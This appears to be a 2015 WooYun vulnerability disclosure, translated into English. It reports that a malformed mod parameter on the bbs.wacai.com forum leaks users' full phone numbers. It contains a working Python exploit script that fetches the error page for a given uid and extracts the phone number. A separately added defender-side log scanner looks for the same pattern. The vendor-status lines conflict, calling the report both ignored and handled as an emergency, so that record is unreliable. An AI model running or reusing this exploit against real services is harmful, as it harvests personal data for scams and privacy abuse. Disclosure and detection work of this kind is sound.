WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-06-19: Details have been sent to the vendor and are awaiting the vendor's handling.
2015-06-24: The vendor has actively ignored the vulnerability; details are disclosed to the public.
Call it small or call it big, this vulnerability is fine as long as the black-market crowd does not exploit it; otherwise the screen fills up with scam messages...
Enough talk, straight to the screenshots.
The problem is in this URL:
http://bbs.wacai.com/home.php?mod=spacecp'&ac=poke&op=send&uid=3864222&handlekey=propokehk_3864222&infloat=yes&handlekey=a_poke_3864222&inajax=1&ajaxtarget=fwin_content_a_poke_3864222
Append any symbol after mod=spacecp (here I added a single quote) and the page is returned with an internal error, and the phone number is displayed in full...
Exp:
# -*- coding: utf-8 -*-
__author__ = 'SheepGuest'

import re
import urllib
import urllib2
#from sys import argv


class Wacai:
    def __init__(self, uid):
        self.url_headers = {
            # Original had 'User_Agent', which urllib2 would not send as a real User-Agent header.
            'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
            'Proxy-Connection': 'keep-alive',
            'Cache-Control': 'max-age=0',
            'Accept': '*/*',
            'x-requested-with': 'XMLHttpRequest',
            'Accept-Language': 'zh-cn',
            'Referer': 'http://bbs.wacai.com/home.php?mod=space&uid=' + str(uid) + '&do=profile.&from=space',
        }
        self.url = 'http://bbs.wacai.com/home.php'
        # The 11-digit phone number is leaked at the start of the error page's <title>.
        self.req = re.compile('<title>(\d{11}).*?</title>')

    def gethtml(self, uid):
        try:
            # 'spacecp.' is the malformed mod value (any appended symbol triggers the
            # internal-error page). A list of tuples keeps both handlekey parameters;
            # the original dict silently dropped the first one.
            post_values = urllib.urlencode([
                ('mod', 'spacecp.'), ('ac', 'poke'), ('op', 'send'), ('uid', str(uid)),
                ('handlekey', 'propokehk_' + str(uid)), ('infloat', 'yes'),
                ('handlekey', 'a_poke_' + str(uid)), ('inajax', '1'),
                ('ajaxtarget', 'fwin_content_a_poke_' + str(uid)),
            ])
            postdata = self.url + '?' + post_values
            request = urllib2.Request(postdata, data=None, headers=self.url_headers)
            response = urllib2.urlopen(request)
            return response.read().decode('utf-8')
        except urllib2.URLError, e:
            if hasattr(e, "reason"):
                print u"Failed to connect to wacai, reason:", e.reason
            return None

    def getTel(self, response):
        if response is None:
            # gethtml already reported the connection failure.
            return None
        try:
            result = re.search(self.req, response)
            result = result.group(1)
            print 'Tel is : %s' % result
        except AttributeError, e:
            print u"Please enter a valid uid"
            return None


if __name__ == '__main__':
    #script,uid = argv
    uid = raw_input('input uid:')
    if len(uid) > 7:
        print u"uid must be 1 to 7 digits"
    else:
        ptel = Wacai(uid)
        response = ptel.gethtml(uid)
        ptel.getTel(response)
The screenshot above shows the test result.
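As an added defender-side example (not part of the original report), the following Python 3 script scans access-log lines for the pattern this report relies on: a `mod` parameter carrying characters that no legitimate module name contains, and one source walking through many `uid` values with such requests. The log lines, IP addresses and the assumption that module names are plain lowercase words are all constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate module names are plain lowercase words (space, spacecp, ...).
VALID_MOD = re.compile(r'^[a-z]+$')

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Jun/2015:10:00:01 +0800] "GET /home.php?mod=space&uid=3864222&do=profile HTTP/1.1" 200 5120
203.0.113.9 - - [19/Jun/2015:10:00:02 +0800] "GET /home.php?mod=spacecp'&ac=poke&op=send&uid=3864222&inajax=1 HTTP/1.1" 200 812
203.0.113.9 - - [19/Jun/2015:10:00:03 +0800] "GET /home.php?mod=spacecp.&ac=poke&op=send&uid=3864223&inajax=1 HTTP/1.1" 200 810
203.0.113.9 - - [19/Jun/2015:10:00:04 +0800] "GET /home.php?mod=spacecp.&ac=poke&op=send&uid=3864224&inajax=1 HTTP/1.1" 200 809
203.0.113.5 - - [19/Jun/2015:10:00:05 +0800] "GET /forum.php?mod=viewthread&tid=12 HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def parse_line(line):
    """Parse one log line into a dict with the query string already split."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['query'] = parse_qs(urlsplit(rec['path']).query, keep_blank_values=True)
    return rec


def is_malformed_mod(rec):
    """True if any mod value contains characters outside [a-z] (e.g. spacecp' or spacecp.)."""
    return any(not VALID_MOD.match(v) for v in rec['query'].get('mod', []))


def analyze(log_text, enum_threshold=3):
    """Return (list of (ip, path) with a malformed mod, sorted IPs that used it on many uids)."""
    hits = []
    uids_by_ip = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_malformed_mod(rec):
            continue
        hits.append((rec['ip'], rec['path']))
        for uid in rec['query'].get('uid', []):
            uids_by_ip[rec['ip']].add(uid)
    enumerating = sorted(ip for ip, uids in uids_by_ip.items() if len(uids) >= enum_threshold)
    return hits, enumerating
```

Alerting on the second result catches bulk harvesting of phone numbers even when each individual request returns HTTP 200.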
Fix suggestion: filter the input completely.
Severity: no impact (vendor ignored)
Ignored at: 2015-06-24 08:32
Vulnerability Rank: 15 (WooYun rating)
2015-06-24: Thank you for your feedback; the vulnerability has been handled as an emergency.